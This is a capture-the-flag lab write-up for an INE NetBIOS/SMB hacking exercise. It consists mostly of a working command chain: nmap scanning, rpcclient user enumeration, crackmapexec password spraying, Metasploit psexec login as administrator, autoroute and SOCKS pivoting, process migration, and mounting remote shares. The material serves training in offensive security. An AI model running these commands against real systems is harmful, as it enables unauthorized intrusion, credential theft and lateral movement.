NetBIOS Hacking

You will learn to enumerate the SMB service and exploit it using different brute-forcing and exploitation tools. Also, it covers pivoting and how to leverage net utility to mount the shared drives in the pivot network.

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable SMB service can be accessed using the tools installed on Kali on [http://demo.ine.local] and [http://demo1.ine.local.]

Objective: Exploit both the target and find the flag!

Tools

The best tools for this lab are:

• Metasploit Framework

• Nmap

• Hydra

• Proxychains

Writeup

ping -c 1 demo.ine.local
ping -c 1 demo1.ine.local

nmap -sSVC demo.ine.local

rpcclient -U "" demo.ine.local -N -c "enumdomusers" | sed -E 's/^user:\[(.*)\] rid:\[.*\]$/\1/'

crackmapexec smb demo.ine.local -u users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"

msfconsole -q
use exploit/windows/smb/psexec
set rhosts demo.ine.local
set smbuser administrator
set smbpass password1
run

run autoroute -s 10.2.29.52
background

cat /etc/proxychains4.conf

use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run
jobs

sessions -i 1
migrate -N explorer.exe
shell
net view 10.2.29.52

net use D: \\10.2.29.52\Documents
net use K: \\10.2.29.52\K$